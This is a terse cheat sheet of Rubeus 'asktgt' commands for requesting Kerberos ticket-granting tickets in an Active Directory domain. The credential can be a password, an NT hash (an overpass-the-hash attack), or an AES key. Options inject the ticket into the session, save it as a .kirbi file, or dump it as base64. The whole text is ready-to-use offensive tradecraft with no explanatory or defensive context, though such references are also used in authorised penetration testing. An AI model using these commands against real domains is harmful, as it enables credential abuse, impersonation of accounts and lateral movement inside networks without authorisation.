Password to TGT (inject) |
Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /ptt |
NTLM hash to TGT (RC4_HMAC) (inject) |
Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<NTHASH> /ptt |
AES-256 to TGT (inject) |
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<HEX> /ptt |
AES-128 to TGT (inject) |
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes128:<HEX> /ptt |
Machine account (password) |
Rubeus.exe asktgt /user:<machine$> /domain:<domain> /password:<password> /ptt |
Specify DC/KDC |
Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /dc:<dc_ip_or_fqdn> /ptt |
Save TGT to file |
Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /outfile:C:\temp\<user>.tgt.kirbi |
Base64 ticket to stdout |
Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /nowrap |